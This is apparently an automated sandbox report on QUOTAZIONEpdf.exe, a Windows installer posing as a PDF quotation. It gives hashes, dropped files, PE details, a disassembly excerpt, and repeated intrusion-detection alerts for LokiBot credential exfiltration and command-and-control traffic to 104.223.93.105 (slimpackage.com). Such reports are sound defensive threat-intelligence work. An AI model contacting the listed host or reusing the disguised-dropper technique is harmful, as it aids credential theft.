http://nsis.sf.net/NSIS_Error | QUOTAZIONEpdf.exe | false | | high
http://nsis.sf.net/NSIS_ErrorError | QUOTAZIONEpdf.exe | false | | high
http://www.ibsensoftware.com/ | QUOTAZIONEpdf.exe, QUOTAZIONEpdf.exe, 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, QUOTAZIONEpdf.exe, 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown

              Contacted IPs

              Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.223.93.105 | slimpackage.com | United States | 8100 | ASN-QUADRANET-GLOBALUS | true

              Private

              IP
              192.168.2.1

              General Information

              Joe Sandbox Version:34.0.0 Boulder Opal
              Analysis ID:553085
              Start date:14.01.2022
              Start time:09:51:34
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 5m 41s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:QUOTAZIONEpdf.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:20
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@3/6@56/2
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 73.1% (good quality ratio 70.4%)
              • Quality average: 79.1%
              • Quality standard deviation: 27.8%
              HCA Information:
              • Successful, ratio: 88%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .exe
              Warnings:
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
              • HTTP Packets have been reduced
              • TCP Packets have been reduced to 100
              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed, report is missing behavior information
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

Time | Type | Description
09:52:41 | API Interceptor | 53x Sleep call for process: QUOTAZIONEpdf.exe modified

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASN

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Temp\nsr3B6A.tmp
              Process:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              File Type:data
              Category:dropped
              Size (bytes):250687
              Entropy (8bit):7.724868567895106
              Encrypted:false
              SSDEEP:3072:1DyoBWj0S6M6pd7gA/FY2eM203epRkhG2AW3cKGPx5UvG0TTxT5ToKbvosMUC1qk:BZS6M6v0OSV/pShtRMtIzxdvg
              MD5:17CCB3C022F9B93E6E7E2A40C253DE9B
              SHA1:4D99B2643277CCA9B2FFC1DB5E9247212EA155F0
              SHA-256:AB11BFD0AF1FE8B3C42E933F37DFDA582152FFF477AA9DDE4EBB1ADFBD7BC72E
              SHA-512:E292772D295B45C85E79D6CE37F607F977F20F337DA679B6A2EA78D436631D6DAA9CB844D70A6239F851E1709309D94A0EB808C8AA949A0FB4393F3876333282
              Malicious:false
              Reputation:low
              C:\Users\user\AppData\Local\Temp\nsr3B6B.tmp\tncvu.dll
              Process:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):4096
              Entropy (8bit):3.801392215291429
              Encrypted:false
              SSDEEP:24:e1GSb0JDlOErEcQeV3ax/+FBFUQahkFsAryvDTy2La5DTyxk8q6I1nPnRuV4MPgs:SgZF4h6FBFUQYXze9r6IPRuqStkx
              MD5:7F8DBC496B4EB973EC6509A63B7A4C01
              SHA1:E3E07E016B3A97604B94CBF8CB2C0FC0BF21033D
              SHA-256:4B229D563D725A5F994DEBF010F24F43D6078C18EF1D56628F9815372CA45FC6
              SHA-512:D4331F90CE80A5E95CF9E6DD008B6268C733B3A8D0C3CB6200511961126093D5FF0DE73D69F5689E9D7495EBAA8A69EBAE8089B45E080928BE2D37C9FF003E0D
              Malicious:false
              Reputation:low
              C:\Users\user\AppData\Local\Temp\pdqlrunrcm
              Process:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              File Type:DOS executable (COM)
              Category:dropped
              Size (bytes):5136
              Entropy (8bit):6.121649200700411
              Encrypted:false
              SSDEEP:96:N+CSmQtQfy1mW8itQYKA36VwVmgEVBS0SNxjzvZOXVYBnZ5r:N+CSmQKK1mWBtQlAtVDEVtS7PvnPr
              MD5:B97AC6F1BFD2778EC14E068EBCEC96AE
              SHA1:AE5C7D27BE7135FD5765A337CBA06CAA65E943A9
              SHA-256:065853BAB7BD450615B9697F39486EB81AB42F34AA502BB8BBC9631FCA53C608
              SHA-512:AF68D42ED2C127C2354BAEE151F23C967386C215EF9523943D594D85F94C208EC3C31D20479DAE1D5C6CBDBB4CABED88B4EF1555C17C98A6737446971870C72E
              Malicious:false
              Reputation:low
              C:\Users\user\AppData\Local\Temp\wtmxan9q1x7moo
              Process:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              File Type:data
              Category:dropped
              Size (bytes):216745
              Entropy (8bit):7.990426242680324
              Encrypted:true
              SSDEEP:3072:uWj0S6M6pd7gA/FY2eM203epRkhG2AW3cKGPx5UvG0TTxT5ToKbvosMUC1qi:SS6M6v0OSV/pShtRMtIzxdvgT
              MD5:BAC58EACE647B10E7E15CCD5BCB67309
              SHA1:60C8B10660CA6837C542855B77AA703139D6D02B
              SHA-256:C35DD027079BE254D7EE5FBA88646D3BB6DCBDED2356041512441E1FBF08A1AE
              SHA-512:6A1F087896210D9811C4E6352ED8D02323F50F1754FA3590B3DD1782F344689FD275D0375676D296BBBE4CA50399B83D39937CB52A2F7743012C442C8AEE4135
              Malicious:false
              Reputation:low
              C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
              Process:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:high, very likely benign file
              Preview: 1
              C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
              Process:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              File Type:data
              Category:dropped
              Size (bytes):46
              Entropy (8bit):1.0424600748477153
              Encrypted:false
              SSDEEP:3:/lbON:u
              MD5:89CA7E02D8B79ED50986F098D5686EC9
              SHA1:A602E0D4398F00C827BFCF711066E67718CA1377
              SHA-256:30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
              SHA-512:C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: ........................................user.

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):7.862243713227495
              TrID:
              • Win32 Executable (generic) a (10002005/4) 92.16%
              • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:QUOTAZIONEpdf.exe
              File size:250601
              MD5:23b85c2f43b23b57411e4f4366a10b25
              SHA1:1511bfee72f99f691c93a1e6b070724890c6aea8
              SHA256:9ad929181f755701c0152618393ccff03e0499944c2e3f22fa2d0539347f5c45
              SHA512:7762714729e6bcbec554e573554ac5a78333a36369c3fe2a81c17fac2810b0b19fa191f05119a4805f7de27f15d2c9252ede56e3dd4b9799cce7593bbd8ae769
              SSDEEP:6144:/wC3lY9KbXDPmKY9xUa07Bv0pe59CGKZDcMbDpTHle:5q0WKASKpCyZwwDlHle

              File Icon

              Icon Hash:1c188bca1b2d565b

              Static PE Info

              General

              Entrypoint:0x403225
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              DLL Characteristics:
              Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:099c0646ea7282d232219f8807883be0

              Entrypoint Preview

              Instruction
              sub esp, 00000180h
              push ebx
              push ebp
              push esi
              xor ebx, ebx
              push edi
              mov dword ptr [esp+18h], ebx
              mov dword ptr [esp+10h], 00409128h
              xor esi, esi
              mov byte ptr [esp+14h], 00000020h
              call dword ptr [00407030h]
              push 00008001h
              call dword ptr [004070B4h]
              push ebx
              call dword ptr [0040727Ch]
              push 00000008h
              mov dword ptr [00423F58h], eax
              call 00007FAFA8C66570h
              mov dword ptr [00423EA4h], eax
              push ebx
              lea eax, dword ptr [esp+34h]
              push 00000160h
              push eax
              push ebx
              push 0041F450h
              call dword ptr [00407158h]
              push 004091B0h
              push 004236A0h
              call 00007FAFA8C66227h
              call dword ptr [004070B0h]
              mov edi, 00429000h
              push eax
              push edi
              call 00007FAFA8C66215h
              push ebx
              call dword ptr [0040710Ch]
              cmp byte ptr [00429000h], 00000022h
              mov dword ptr [00423EA0h], eax
              mov eax, edi
              jne 00007FAFA8C63A3Ch
              mov byte ptr [esp+14h], 00000022h
              mov eax, 00429001h
              push dword ptr [esp+14h]
              push eax
              call 00007FAFA8C65D08h
              push eax
              call dword ptr [0040721Ch]
              mov dword ptr [esp+1Ch], eax
              jmp 00007FAFA8C63A95h
              cmp cl, 00000020h
              jne 00007FAFA8C63A38h
              inc eax
              cmp byte ptr [eax], 00000020h
              je 00007FAFA8C63A2Ch
              cmp byte ptr [eax], 00000022h
              mov byte ptr [eax+eax+00h], 00000000h

              Rich Headers

              Programming Language:
              • [EXP] VC++ 6.0 SP5 build 8804

              Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c000 | 0x4148 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

              Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5976 | 0x5a00 | False | 0.668619791667 | data | 6.46680044621 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1190 | 0x1200 | False | 0.444878472222 | data | 5.17796812871 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1af98 | 0x400 | False | 0.55078125 | data | 4.68983486809 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x24000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x2c000 | 0x4148 | 0x4200 | False | 0.441169507576 | data | 5.0955746829 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

              Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x2c1f0 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4294967295, next used block 4294967295 | English | United States
RT_ICON | 0x2e798 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4294374645, next used block 4294967295 | English | United States
RT_ICON | 0x2f840 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_DIALOG | 0x2fca8 | 0x100 | data | English | United States
RT_DIALOG | 0x2fda8 | 0x11c | data | English | United States
RT_DIALOG | 0x2fec8 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x2ff28 | 0x30 | data | English | United States
RT_MANIFEST | 0x2ff58 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

              Imports

              DLL | Import
              KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
              USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
              GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
              SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
              ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
              COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
              ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
              VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

              Possible Origin

              Language of compilation system | Country where language is spoken | Map
              English | United States |

              Network Behavior

              Snort IDS Alerts

              Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
              01/14/22-09:52:38.800709 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49742 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:38.800709 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49742 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:38.800709 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49742 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:40.325542 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49743 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:40.325542 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49743 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:40.325542 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49743 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:41.740730 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49744 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:41.740730 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49744 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:41.740730 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49744 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:43.225955 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49745 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:43.225955 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49745 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:43.225955 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49745 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:44.662959 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49746 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:44.662959 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49746 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:44.662959 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49746 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:46.652463 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49747 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:46.652463 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49747 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:46.652463 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49747 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:48.938222 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49748 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:48.938222 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49748 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:48.938222 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49748 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:50.316402 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49749 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:50.316402 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49749 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:50.316402 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49749 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:51.814681 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49750 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:51.814681 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49750 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:51.814681 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49750 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:53.249069 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49751 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:53.249069 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49751 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:53.249069 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49751 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:54.669016 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49752 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:54.669016 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49752 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:54.669016 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49752 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:57.212577 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49755 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:57.212577 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49755 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:57.212577 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49755 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:59.611440 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49756 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:59.611440 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49756 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:52:59.611440 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49756 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:02.120828 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49757 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:02.120828 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49757 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:02.120828 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49757 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:03.980417 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49758 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:03.980417 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49758 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:03.980417 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49758 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:06.924774 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49759 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:06.924774 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49759 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:06.924774 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49759 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:08.606764 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49760 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:08.606764 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49760 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:08.606764 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49760 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:10.307978 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49761 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:10.307978 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49761 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:10.307978 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49761 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:11.692209 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49762 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:11.692209 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49762 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:11.692209 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49762 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:13.390692 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49763 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:13.390692 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49763 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:13.390692 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49763 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:15.147551 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49764 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:15.147551 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49764 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:15.147551 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49764 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:16.674289 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49765 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:16.674289 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49765 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:16.674289 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49765 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:18.230034 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49766 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:18.230034 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49766 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:18.230034 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49766 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:19.843821 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49770 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:19.843821 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49770 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:19.843821 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49770 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:21.176590 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49771 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:21.176590 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49771 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:21.176590 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49771 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:22.793268 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49772 | 80 | 192.168.2.3 | 104.223.93.105
